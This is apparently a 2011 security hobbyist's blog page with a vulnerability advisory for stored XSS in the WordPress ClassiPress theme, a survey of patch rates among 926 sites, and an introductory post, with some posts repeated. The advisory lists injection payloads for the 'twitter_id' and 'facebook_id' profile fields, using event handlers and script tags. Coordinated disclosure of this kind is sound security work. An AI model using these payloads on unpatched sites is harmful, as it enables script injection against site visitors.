While the bug has been patched and an advisory released for it, I also took the time to do some informal research to gauge the scope of last month's XSS vulnerability .
I started scanning six weeks after the patch release. Therefore it is probably safe that results are representative of those who will patch their systems. Due to the continuing changes in the Google web API, I chose Bing over Google as my search-engine of choice. After searching and using a couple techniques to increase the number of results, I ended up with a list of 1110 different sites running the theme. These were scanned and fingerprinted. Of the 926 systems running standard configurations, here is the version breakdown.
Version - Systems:
2.0.5 - 4
2.9.3 - 1
3.0.1 - 12
3.0.2 - 123
3.0.3 - 10
3.0.4 - 55
3.0.5.1 - 26
3.0.5.2 - 23
3.0.5.3 - 120
3.0.5.4 - 145
3.1 - 406
3.1.2 - 9
3.1.3 - 77
3.1.4 - 162
3.1.5 - 129
No statistical model fit the data. However, one fact is obvious. Patch rates for old versions do not look good. Over two-thirds of the systems running Classipress are vulnerable. Specifically, manually copying patch files tends to intimidate the non-technical audience that products like Wordpress attract.
While looking up a list of version numbers on the AppThemes website I found a nice surprise. AppThemes just explained that version 3.1.5 (which contained the patch) also contained an auto-updater behind the scenes. Manually copying patch files tends to intimidate the non-technical audience that products like Wordpress attract. Companies that pay attention to their customers' needs are appreciated. Thanks, guys!
Saturday, December 3, 2011
Monday, October 31, 2011
Classipress Multiple Stored XSS
Note: Here is an explanation I recently submitted to a vendor and later to Offensive Security's exploit-db. The patch is at http://docs.appthemes.com/classipress/classipress-version-3-1-5/. I plan on posting scanning code sometime this week. I also plan on posting a synopsis of payload activation options sometime in the near future.
Regards,
Paul
Shout-outs: DC 501, snide, Firmwarez, xalg
# Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
# Date: 2011-09-26
# Author: Paul Loftness
# Contact:http://attackvectorlabs.blogspot.com
# Vendor: Appthemes LLc.
# Product Web Page: http://www.appthemes.com/themes/classipress/
# Version: <=3.1.4
# Tested Versions: 3.1.4, 3.0.5.3
Summary:
-------------------------
ClassiPress is a popular and widely used classified ads software for WordPress.
Description:
-------------------------
Classipress is vulnerable to multiple stored XSS vulnerabilities. Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitisized or poorly sanitised (version specific) allowing the attacker to insert Javascript code.
In version 3.0.5.2 and presumably all previous versions, no sanitation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4, the less-than character is sanitised but an attacker can still insert quotes and place an event handler in the tag.
Proof-of-Concept Code:
-------------------------
Insertion page: http://example_site/author/profile/
Infected page : http://example_site/author/attacker_username/
Note: Some sites replace "author" with another path, this is not a vanilla configuration, however.
Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:
twitter_id: " onmouseover="alert('XSS');
facebook_id: " onmouseover="alert('XSS');
Alternate Exploit code:
twitter_id: "><script>alert('XSS');</script><div id="
facebook_id: "><script>alert('XSS');</script><div id="
Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
twitter_id: " onmouseover='alert("XSS");'><
facebook_id: " onmouseover='alert("XSS");'><
Timeline:
-------------------------
Vulnerability Discovered: 8/10/2011
Vulnerability Reported to Vendor: 9/1/2011
Patch Released with version 3.1.5: 10/7/2011
Regards,
Paul
Shout-outs: DC 501, snide, Firmwarez, xalg
# Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
# Date: 2011-09-26
# Author: Paul Loftness
# Contact:http://attackvectorlabs.blogspot.com
# Vendor: Appthemes LLc.
# Product Web Page: http://www.appthemes.com/themes/classipress/
# Version: <=3.1.4
# Tested Versions: 3.1.4, 3.0.5.3
Summary:
-------------------------
ClassiPress is a popular and widely used classified ads software for WordPress.
Description:
-------------------------
Classipress is vulnerable to multiple stored XSS vulnerabilities. Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitisized or poorly sanitised (version specific) allowing the attacker to insert Javascript code.
In version 3.0.5.2 and presumably all previous versions, no sanitation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4, the less-than character is sanitised but an attacker can still insert quotes and place an event handler in the tag.
Proof-of-Concept Code:
-------------------------
Insertion page: http://example_site/author/profile/
Infected page : http://example_site/author/attacker_username/
Note: Some sites replace "author" with another path, this is not a vanilla configuration, however.
Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:
twitter_id: " onmouseover="alert('XSS');
facebook_id: " onmouseover="alert('XSS');
Alternate Exploit code:
twitter_id: "><script>alert('XSS');</script><div id="
facebook_id: "><script>alert('XSS');</script><div id="
Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
twitter_id: " onmouseover='alert("XSS");'><
facebook_id: " onmouseover='alert("XSS");'><
Timeline:
-------------------------
Vulnerability Discovered: 8/10/2011
Vulnerability Reported to Vendor: 9/1/2011
Patch Released with version 3.1.5: 10/7/2011
Sunday, September 25, 2011
Beginnings...
Hello,
Over the past several years, as an educational exercise, I have taken apart a number of pieces of software. Much of the specialized security research I do in my spare time merely occupies space on my hard-drive. Due to the urging of some friends, I have decided to try to share some of this knowledge with the community. In this blog, I hope to...
1) Contribute a hobbyist's perspective on the IT industry, with a focus on security.
2) Provide more in-depth explanation and analysis for bugs posted on Exploit-DB, Bugraq, etc.
3) Accrue a varied readership from a variety of backgrounds. This will
hopefully help provide a varied viewpoint on the topic of security.
Comments are welcome.
Over the past several years, as an educational exercise, I have taken apart a number of pieces of software. Much of the specialized security research I do in my spare time merely occupies space on my hard-drive. Due to the urging of some friends, I have decided to try to share some of this knowledge with the community. In this blog, I hope to...
1) Contribute a hobbyist's perspective on the IT industry, with a focus on security.
2) Provide more in-depth explanation and analysis for bugs posted on Exploit-DB, Bugraq, etc.
3) Accrue a varied readership from a variety of backgrounds. This will
hopefully help provide a varied viewpoint on the topic of security.
Comments are welcome.
Subscribe to:
Posts (Atom)